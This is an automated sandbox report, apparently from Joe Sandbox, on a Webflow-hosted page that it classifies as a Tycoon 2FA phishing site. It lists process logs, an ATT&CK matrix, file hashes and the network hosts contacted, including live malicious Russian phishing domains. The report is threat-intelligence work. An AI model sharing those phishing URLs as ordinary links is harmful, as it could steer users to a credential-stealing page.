              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.5:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.140:443 -> 192.168.2.5:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.140:443 -> 192.168.2.5:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.5:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.120:443 -> 192.168.2.5:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.120:443 -> 192.168.2.5:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49757 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6460_1303250005Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6460_1303250005Jump to behavior
              Source: classification engineClassification label: mal100.phis.evad.win@24/24@20/9
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2372 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4940 /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlestownseniorhighschool.webflow.io/"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2372 /prefetch:3Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4940 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.5.d.script.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1651126 URL: https://littlestownseniorhi... Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 24 Antivirus detection for URL or domain 2->24 26 Yara detected AntiDebug via timestamp check 2->26 28 Yara detected Tycoon 2FA PaaS 2->28 30 6 other signatures 2->30 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.5, 138, 443, 49391 unknown unknown 6->16 11 chrome.exe 6->11         started        14 chrome.exe 6->14         started        process5 dnsIp6 18 fgof.koxicarev.ru 172.67.166.120, 443, 49752, 49753 CLOUDFLARENETUS United States 11->18 20 www.google.com 142.251.40.164, 443, 49728, 49767 GOOGLEUS United States 11->20 22 6 other IPs or domains 11->22

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://littlestownseniorhighschool.webflow.io/0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://fgof.koxicarev.ru/favicon.ico100%Avira URL Cloudphishing
              https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e5940%Avira URL Cloudsafe
              https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e590%Avira URL Cloudsafe
              https://zh1od.idmquc.ru/kabutar@sp5p7o0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              littlestownseniorhighschool.webflow.io
              104.18.36.248
              truefalse
                unknown
                d3e54v103j8qbb.cloudfront.net
                13.33.251.210
                truefalse
                  high
                  zh1od.idmquc.ru
                  104.21.96.1
                  truefalse
                    unknown
                    a.nel.cloudflare.com
                    35.190.80.1
                    truefalse
                      high
                      fgof.koxicarev.ru
                      172.67.166.120
                      truetrue
                        unknown
                        cdn.prod.website-files.com
                        104.18.160.117
                        truefalse
                          high
                          www.google.com
                          142.251.40.164
                          truefalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://cdn.prod.website-files.com/img/favicon.icofalse
                              high
                              https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.cssfalse
                                high
                                https://fgof.koxicarev.ru/zXMKsj/true
                                  unknown
                                  https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-text-d2.c82cec3b78.svgfalse
                                    high
                                    https://fgof.koxicarev.ru/favicon.icofalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://littlestownseniorhighschool.webflow.io/true
                                      unknown
                                      https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-icon-d2.89e12c322e.svgfalse
                                        high
                                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                          high
                                          https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.jsfalse
                                            high
                                            https://zh1od.idmquc.ru/kabutar@sp5p7ofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594false
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e59chromecache_100.6.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://FgoF.koxicarev.ru/zXMKsj/chromecache_100.6.drfalse
                                              unknown
                                              https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.chromecache_100.6.drfalse
                                                high
                                                https://cdn.prod.website-files.com/img/webclip.pngchromecache_100.6.drfalse
                                                  high
                                                  https://webflow.comchromecache_100.6.drfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.18.36.248
                                                    littlestownseniorhighschool.webflow.ioUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.160.117
                                                    cdn.prod.website-files.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    142.251.40.164
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    13.33.251.140
                                                    unknownUnited States
                                                    16509AMAZON-02USfalse
                                                    13.33.251.210
                                                    d3e54v103j8qbb.cloudfront.netUnited States
                                                    16509AMAZON-02USfalse
                                                    172.67.166.120
                                                    fgof.koxicarev.ruUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    104.21.96.1
                                                    zh1od.idmquc.ruUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    35.190.80.1
                                                    a.nel.cloudflare.comUnited States
                                                    15169GOOGLEUSfalse
                                                    IP
                                                    192.168.2.5
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1651126
                                                    Start date and time:2025-03-28 13:41:36 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 3m 8s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:browseurl.jbs
                                                    Sample URL:https://littlestownseniorhighschool.webflow.io/
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:17
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.phis.evad.win@24/24@20/9
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.204.23.20, 172.253.122.84, 142.250.80.78, 142.250.72.99, 142.250.80.14, 151.101.46.172, 142.251.35.163, 172.202.163.200, 20.96.153.111, 150.171.27.10, 23.57.90.169
                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: https://littlestownseniorhighschool.webflow.io/
                                                    No simulations
                                                    No context
                                                    No context
                                                    No context
                                                    No context
                                                    No context
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1924), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):1926
                                                    Entropy (8bit):5.348454776853866
                                                    Encrypted:false
                                                    SSDEEP:48:YFyOkXzbALgnC4iGba2o+wb+C9nPCy9zVmz6:GybjbALTZbzZpC6
                                                    MD5:E3D643DE9FC43A10AD32B3FF84AF6F23
                                                    SHA1:4C6C679877B1F863C9D63E046AEE0869C9CC56B1
                                                    SHA-256:FC3194917A944BE5275ADBCD733A1446B9E0B7E9876363AB4852AD5DCBD4A4A9
                                                    SHA-512:D2B7771C9C7D4157FDA30078CC899537F88C333D570CA9E867EE2C3CDAE7A4C7D3777F3ABAA3C42EA820D0EC4E4CDA3214FB70B928D24D7849E7710ED10E2F83
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://littlestownseniorhighschool.webflow.io/
                                                    Preview:<!DOCTYPE html> This site was created in Webflow. https://webflow.com --> Last Published: Tue Mar 25 2025 15:13:43 GMT+0000 (Coordinated Universal Time) --><html data-wf-domain="littlestownseniorhighschool.webflow.io" data-wf-page="67e2c79fd85ebcb1b252e59b" data-wf-site="67e2c79fd85ebcb1b252e594" data-wf-status="1"><head><meta charset="utf-8"/><title>LittlestownSeniorHighSchool</title><meta content="width=device-width, initial-scale=1" name="viewport"/><meta content="Webflow" name="generator"/><link href="https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css" rel="stylesheet" type="text/css"/><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script><link href="https://cdn.prod.website-files.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon"/><link
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                    Category:dropped
                                                    Size (bytes):15086
                                                    Entropy (8bit):3.4582181256178264
                                                    Encrypted:false
                                                    SSDEEP:96:jQ2eQFXKn5O0NkoqpWyRuaoiQ5733LimpFim+xuUbw:jzFan5O0qbMy4d3bBWnuU
                                                    MD5:1F894F487D068A2CED95D5CD4F88598C
                                                    SHA1:743A2C39F538650D53664D19AB5079CFC9BA55D2
                                                    SHA-256:4239819D399860EB27D8A73417F9BD108D45D11676F68B5EDAAE328EC197D55E
                                                    SHA-512:A9BD551FA9F297083351B37DDE9CE6080D14433D26215561875C5A3E8C6EA8ABBE8F5F3204793A7EF9690A4563A2BC640E6A32CFF15F9A9BB42CD322CE1F2717
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$..................92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92+.92
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (36033), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):36033
                                                    Entropy (8bit):5.283379212790306
                                                    Encrypted:false
                                                    SSDEEP:768:5+nVkbGISJz29VhVI5Zx3KT6rPBW3Cqv/HnUwBCr26+7v0:snVkbGISQ6rBWVB4
                                                    MD5:C2BAEB117CAFF557B76166E9BF46D467
                                                    SHA1:8128E3C804753253FA42D3E7C78B1B664425A073
                                                    SHA-256:1896EE7E979BDD3A4CC0BA8169DAD527BDD09E8335AA75A4034162E348E26293
                                                    SHA-512:8E1A664EB356901EE655B3734772EA44EE302007F1282D37AE060B1676D919E0AABB8E0A122B726157CF163CD362D507279BA73B82371533C1703159AFC386E9
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js
                                                    Preview:(()=>{var t={487:function(){"use strict";window.tram=function(t){function e(t,e){return(new C.Bare).init(t,e)}function n(t){var e=parseInt(t.slice(1),16);return[e>>16&255,e>>8&255,255&e]}function i(t,e,n){return"#"+(0x1000000|t<<16|e<<8|n).toString(16).slice(1)}function r(){}function o(t,e,n){if(void 0!==e&&(n=e),void 0===t)return n;var i=n;return Z.test(t)||!K.test(t)?i=parseInt(t,10):K.test(t)&&(i=1e3*parseFloat(t)),0>i&&(i=0),i==i?i:n}function a(t){B.debug&&window&&window.console.warn(t)}var s,u,c,l=function(t,e,n){function i(t){return"object"==typeof t}function r(t){return"function"==typeof t}function o(){}return function a(s,u){function c(){var t=new l;return r(t.init)&&t.init.apply(t,arguments),t}function l(){}u===n&&(u=s,s=Object),c.Bare=l;var f,h=o[t]=s[t],d=l[t]=c[t]=new o;return d.constructor=c,c.mixin=function(e){return l[t]=c[t]=a(c,e)[t],c},c.open=function(t){if(f={},r(t)?f=t.call(c,d,h,c,s):i(t)&&(f=t),i(f))for(var n in f)e.call(f,n)&&(d[n]=f[n]);return r(d.init)||(d.init
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):9912
                                                    Entropy (8bit):3.9529563769674163
                                                    Encrypted:false
                                                    SSDEEP:192:gLTccPJ37c1fhYJ0VCa8wDY+WCYTx4Pqze9CJCmVjDsUGoT:9KMV8AITHz4Xm9lGoT
                                                    MD5:C82CEC3B78A2B2D267BBFE3C7E838068
                                                    SHA1:70ED58A020C395EED69E3000CB27B7B0FA191360
                                                    SHA-256:3202CB640FADA345AB99415BD087F28E6FEA1C3009DBA51D183CC37BCE036CD7
                                                    SHA-512:85EEF3C4FC445742ED656ACC0600CCECF4F88043E5F2638484E73C6543E5CFB4DD7FBBFA90FC34628C2A1FA1BB0BC5052DF8C1EB454534674BAA4A34C4D94F6B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill="#080808"/>.<path d="M16.152 11.1367C15.4912 11.1367 14.901 10.9704 14.3815 10.6377C13.8665 10.305 13.4609 9.84017 13.1647 9.24316C12.8684 8.6416 12.7226 7.94889 12.7272 7.16504C12.7272 6.38118 12.8776 5.69076 13.1783 5.09375C13.4791 4.49674 13.8893 4.03646 14.4088 3.71289C14.9329 3.38477 15.5276 3.22298 16.193 3.22754C16.6305 3.22754 17.0361 3.30957 17.4098 3.47363C17.7835 3.63314 18.0934 3.85417 18.3395 4.13672C18.5901 4.41471 18.7542 4.71777 18.8317 5.0459L18.4967 5.03223V3.37109H20.3698V11H18.5172L18.524 9.52344L18.8522 9.33203C18.7428 9.66927 18.5559 9.97461 18.2916 10.248C18.0273 10.5215 17.7083 10.738 17.3346 10.8975C16.9609 11.057 16.5667 11.1367 16.152 11.1367ZM16.5621 9.55078C16.9495 9.55078 17.2936 9.45052 17.5944 9.25C17.89
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (2587)
                                                    Category:downloaded
                                                    Size (bytes):37300
                                                    Entropy (8bit):5.225019630523386
                                                    Encrypted:false
                                                    SSDEEP:768:AyNf7A1RE/GqyFVF54mkxWaIi1aUuF9Zl0F6FhF8FPqkowKji/JVxL:Aye1REeqyP0XcPyjowKjY
                                                    MD5:7E3E20A4BE6111B2C861236217837712
                                                    SHA1:31192F23416AF77A88768ED3F10CAA0F362CFBC8
                                                    SHA-256:CAA17FA240FF763618476D4DB81F98E953DD5812FC5580A4644128022D9A82FA
                                                    SHA-512:1803E4495655EDCF1881B044313DA8F0596381B91FBDABA7D8E8C985E9383F746FDA8195A1A07AE0B5048EE4E46C51275753205F3B2545CBF8E74A1EA7774582
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css
                                                    Preview:html {. -webkit-text-size-adjust: 100%;. -ms-text-size-adjust: 100%;. font-family: sans-serif;.}..body {. margin: 0;.}..article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary {. display: block;.}..audio, canvas, progress, video {. vertical-align: baseline;. display: inline-block;.}..audio:not([controls]) {. height: 0;. display: none;.}..[hidden], template {. display: none;.}..a {. background-color: #0000;.}..a:active, a:hover {. outline: 0;.}..abbr[title] {. border-bottom: 1px dotted;.}..b, strong {. font-weight: bold;.}..dfn {. font-style: italic;.}..h1 {. margin: .67em 0;. font-size: 2em;.}..mark {. color: #000;. background: #ff0;.}..small {. font-size: 80%;.}..sub, sup {. vertical-align: baseline;. font-size: 75%;. line-height: 0;. position: relative;.}..sup {. top: -.5em;.}..sub {. bottom: -.25em;.}..img {. border: 0;.}..svg:not(:root) {. overflow: hidden;.}..hr {. box-sizing: content-box;. height: 0;.}..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):9912
                                                    Entropy (8bit):3.9529563769674163
                                                    Encrypted:false
                                                    SSDEEP:192:gLTccPJ37c1fhYJ0VCa8wDY+WCYTx4Pqze9CJCmVjDsUGoT:9KMV8AITHz4Xm9lGoT
                                                    MD5:C82CEC3B78A2B2D267BBFE3C7E838068
                                                    SHA1:70ED58A020C395EED69E3000CB27B7B0FA191360
                                                    SHA-256:3202CB640FADA345AB99415BD087F28E6FEA1C3009DBA51D183CC37BCE036CD7
                                                    SHA-512:85EEF3C4FC445742ED656ACC0600CCECF4F88043E5F2638484E73C6543E5CFB4DD7FBBFA90FC34628C2A1FA1BB0BC5052DF8C1EB454534674BAA4A34C4D94F6B
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://d3e54v103j8qbb.cloudfront.net/img/webflow-badge-text-d2.c82cec3b78.svg
                                                    Preview:<svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill="#080808"/>.<path d="M16.152 11.1367C15.4912 11.1367 14.901 10.9704 14.3815 10.6377C13.8665 10.305 13.4609 9.84017 13.1647 9.24316C12.8684 8.6416 12.7226 7.94889 12.7272 7.16504C12.7272 6.38118 12.8776 5.69076 13.1783 5.09375C13.4791 4.49674 13.8893 4.03646 14.4088 3.71289C14.9329 3.38477 15.5276 3.22298 16.193 3.22754C16.6305 3.22754 17.0361 3.30957 17.4098 3.47363C17.7835 3.63314 18.0934 3.85417 18.3395 4.13672C18.5901 4.41471 18.7542 4.71777 18.8317 5.0459L18.4967 5.03223V3.37109H20.3698V11H18.5172L18.524 9.52344L18.8522 9.33203C18.7428 9.66927 18.5559 9.97461 18.2916 10.248C18.0273 10.5215 17.7083 10.738 17.3346 10.8975C16.9609 11.057 16.5667 11.1367 16.152 11.1367ZM16.5621 9.55078C16.9495 9.55078 17.2936 9.45052 17.5944 9.25C17.89
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (65364)
                                                    Category:downloaded
                                                    Size (bytes):568227
                                                    Entropy (8bit):3.902067140541905
                                                    Encrypted:false
                                                    SSDEEP:1536:ZwgDJCC7nen846wgDJCC7nen84ULBC9LBCD://7nenm/7nenQKS
                                                    MD5:DD361B1BB7898359EF2178F66F543D84
                                                    SHA1:03D4417D64DF7B38516EA77F3F61174A666E77FF
                                                    SHA-256:ABD119162738B0F8189DA9FBDA532062DBB04018D6BFA22A98AFBA3C2BD0A3AC
                                                    SHA-512:87CCF13B0C208D78FC6FBFF35343474BADE166EF1A0BFE75C0F872B53DAC83BE25BB3A61D027D1D54F93E60B550CA6C73E3A73A84FC877548F0747C9557968DA
                                                    Malicious:false
                                                    Reputation:low
                                                    URL:https://fgof.koxicarev.ru/zXMKsj/
